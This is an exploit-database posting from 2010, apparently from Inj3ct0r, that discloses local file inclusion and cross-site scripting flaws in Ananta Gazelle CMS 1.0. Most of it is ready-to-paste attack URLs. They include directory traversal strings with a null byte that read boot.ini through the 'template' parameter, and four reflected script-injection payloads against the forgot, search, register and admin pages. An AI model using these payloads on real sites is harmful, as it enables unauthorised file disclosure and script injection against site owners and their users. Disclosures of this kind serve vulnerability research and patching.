Ananta Gazelle CMS Multiple Vulnerabilities
Posted on 23 August 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Ananta Gazelle CMS Multiple Vulnerabilities</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=========================================== Ananta Gazelle CMS Multiple Vulnerabilities =========================================== ############################################################################ # # # Exploit Title: Ananta_Gazelle Local File inclusion / Xss Vulnerabilities # # # # Date: 23/08/2010 # # # # Author: Sweet # # # # Contact : charif38@hotmail.fr # # # # Software Link: www.anantasoft.com # # # # Download:http://www.anantasoft.com/index.php?Gazelle%20CMS/Download # # # # Version: Ananta_Gazelle1.0 # # # # Tested on: WinXp sp3 # # # # # # # # # # Description : Gazelle is fast, free and requires no learning # # # # you can just dive in with the content and make a big site # # # ############################################################################ 1-Local File Inclusion : Input passed to to the "language" parameter in index.php isn't properly verified, before it is used to include files This can be exploited to include arbitrary files from local resources http://www.example.com/AnantaPatch/index.php?template=../../../../../../../../../../boot.ini%00 http://www.example.com/AnantaPatch/admin/index.php?template=../../../../../../../../../../boot.ini%00 Screen <=> http://img541.imageshack.us/img541/3482/ananta.png 2-Xss : http://www.example.com/AnantaPatch/forgot.php/>"><ScRiPt>alert("Sweet")</ScRiPt> http://www.example.com/AnantaPatch/search.php?lookup=1>'><ScRiPt%20%0a%0d>alert("Sweet")%3B</ScRiPt> http://www.example.com/AnantaPatch/register.php?=>"'><ScRiPt>alert("Sweet")</ScRiPt> http://www.example.com/AnantaPatch/admin/?=>"'><ScRiPt>alert("Sweet")</ScRiPt> Saha Ftourkoum et 1,2,3 viva L'Algerie :)) # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-23]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
